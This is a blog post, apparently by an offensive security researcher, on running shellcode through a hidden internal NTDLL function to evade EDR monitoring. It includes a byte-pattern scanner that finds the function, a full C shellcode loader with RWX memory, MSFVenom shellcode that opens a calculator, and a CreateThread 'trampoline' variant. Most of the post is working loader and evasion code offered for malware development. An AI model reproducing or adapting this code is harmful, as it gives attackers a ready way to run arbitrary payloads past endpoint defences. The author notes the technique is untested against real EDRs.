Internal NTDLL Functions for Shellcode Execution

e-fin

29 Apr 2026 • 6 min read

Malware developers are always looking for new way to execute shellcode. Commonly used Win32 APIs are often hooked or otherwise monitored by an EDR. A classic method that does not require any Win32 APIs is local execution through a function pointer cast as shown below.

void *exec = VirtualAlloc(0, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, shellcodeSize);
((void(*)())exec)();

This method is still fairly reliable and under-appreciated. I have had great success using this to execute shellcode (assuming I don't use RWX).

I've been using Ghidra to look through NTDLL in an effort to find some new execute primitives. NTDLL has documented exports, undocumented exports, and internal "private" functions. A lot of the exports have been well tested and proof of concepts exist, I was wondering if there are any internal functions that are not exported that could be used for executing shellcode.

I found one notable function internal, below is the first 2 assembly instructions of the function disassembled in Ghidra.

MOV        RAX ,qword ptr [RCX  + 0x20 ]
CALL       RAX

This is pretty straight forward. In Windows, RCX holds the first argument passed to the function. RCX is acting as a pointer and the value being read from RCX + 32 bytes (0x20 in hex) is being stored in RAX. RCX is likely a pointer to a struct, and the value being read and moved into RAX is 32 bytes into the struct. Following that, RAX is called.

If we were to call this function from our own code, we would have to call the function with a single argument. The single argument needs to be a pointer to a struct. The struct needs 32 bytes of "padding" and then an 8 byte memory address pointing at our shellcode payload.

The struct layout we will use is below.

typedef struct _MY_STRUCT {
    BYTE padding[32];   
    PVOID pvShellcodeAddr;  
} MY_STRUCT, * PMY_STRUCT;

Before we can populate this struct and pass it to the function, we have to get the address of the function. This function is not exported, so we cannot use the standard "GetProcAddress" approach, we have to build a custom version of "GetProcAddress" that walks through NTDLL and finds the address of this function.

This is pretty straight forward as you can do this by modifying a custom implementation of GetModuleHandle. There are plenty of examples on GitHub of manually performing GetModuleHandle by walking the NT headers. In our custom implementation, instead of returning the address of the DLL, it finds the address of NTDLL, then walks through the bytes looking for the function address.

The first thing we need to is determine if the bytes for the Assembly code above are unique. The previous Assembly code equates to the following bytes:

48 8b 41 20 ff d0

We can use Ghidra to search for those bytes. There is only one instance, perfect!

Now that we have a unique sequence of bytes to search for, we can update our custom implementation of GetModuleHandle to search for those bytes, and return the address of those bytes rather than the address of NTDLL itself.

Below is the specific code that finds the bytes and returns the address. I wont be including my whole custom GetModuleHandle, any one on GitHub can easily be modified with the code below and work.

 PVOID pvBase = pDte->InInitializationOrderLinks.Flink;
 for (int i = 0; i < pDte->SizeOfImage-5;i++) {
     BYTE* p = (BYTE*)pvBase + i;  
     if (p[0] == 0x48 &&
         p[1] == 0x8B &&
         p[2] == 0x41 &&
         p[3] == 0x20 &&
         p[4] == 0xFF &&
         p[5] == 0xD0)
     {
         return p;  
     }
 }

Now that we can programmatically find the address of this internal function, we can call the function with our populated struct. In this example I'm using some MSFVenom shellcode to pop a calculator.


#include <Windows.h>
#include <stdio.h>
#include "structs.h"

PVOID GetInternalFunc1();

unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";


typedef struct _MY_STRUCT {
    BYTE padding[32];   
    PVOID pvShellcodeAddr;  
} MY_STRUCT, * PMY_STRUCT;

int main()
{
    DWORD dwSize = sizeof(buf);

    // allocate some memory for our shellcode
    PVOID pvAddr = VirtualAlloc(NULL,dwSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    // copy the shellocde to our allocated region
    memcpy(pvAddr,buf, dwSize);

    // create an empty payload struct
    MY_STRUCT payload = {0}; 

    // place our shellcode address in the struct
    payload.pvShellcodeAddr = pvAddr;  

    // resolve the address of the internal func 
    PVOID UnFunc = GetInternalFunc1();

    // call our function with the "payload" struct pointer as arg[1]
    ((void(*)())UnFunc)(&payload);
}

I compiled it and it worked, below is a video of the calculator shellcode actually executing.

0:00

/0:04

The million dollar question...

Is this any more evasive or stealthy than local execution through a function pointer cast?

Probably not, maybe even less because we have to walk the NT headers and NTDLL to find the internal function address.

But is it cool and did I have fun? Absolutely.

There is also some other potential use-cases for this method of execution that could be more evasive. The first one that comes to mind is execution with CreateThread. Any decent EDR will monitor this API, specifically the address of the thread start routine. If CreateThread is executing unbacked memory, your probably gonna have a bad time. Even if you do some type of stomping to have your shellcode payload in backed memory, it will likely do a quick scan on that region and potentially detect the presence of shellcode or other malicious signatures.

Using the internal function we found earlier, we can get CreateThread to execute our shellcode by using this internal function as a "trampoline" or "execute gadget" or whatever you wanna call it. When calling CreateThread, we can pass the address of the internal function to the thread start routine, and pass the argument to the internal function through lpParameter.

HANDLE CreateThread(
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  [in]            SIZE_T                  dwStackSize,
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,
  [in]            DWORD                   dwCreationFlags,
  [out, optional] LPDWORD                 lpThreadId
);

If an EDR analyzes the CreateThread call, they will see the start routine is within NTDLL and NTDLL is not modified. Therefore, the thread is executing backed memory within an unmodified Microsoft signed DLL. I cant find any information about EDRs analyzing the lpParameter argument, I wouldn't be surprised if they do. Even if they do, they would have to parse the struct passed to lpParameter, identify unbacked memory addresses, analyze the unbacked memory region and/or determine that unbacked memory will be executed. An added layer of stealth would be to put your shellcode in backed memory, and pass that address within the payload struct.

Lets try it out and see if it works. Instead of directly calling the function, I passed it to CreateThread as is demonstrated below. The calculator shellcode ran successfully.

    HANDLE hThread = CreateThread(NULL,0,UnFunc,&payload,0,NULL);
    WaitForSingleObject(hThread, INFINITE);

Not out of the EDR woods yet...

Now CreateThread may be starting execution in backed memory of a Microsoft signed DLL, but the start address will not exist within the Export Address Table (EAT) of NTDLL. A good EDR could potentially flag this right away as applications should only be executing functions from the EAT, the function we are executing should only be called internally from other locations within NTDLL.

I haven't done any significant testing of this technique against EDRs, once I do, I may come back and update this with my findings. For now, this is nothing more than a fun little experiment.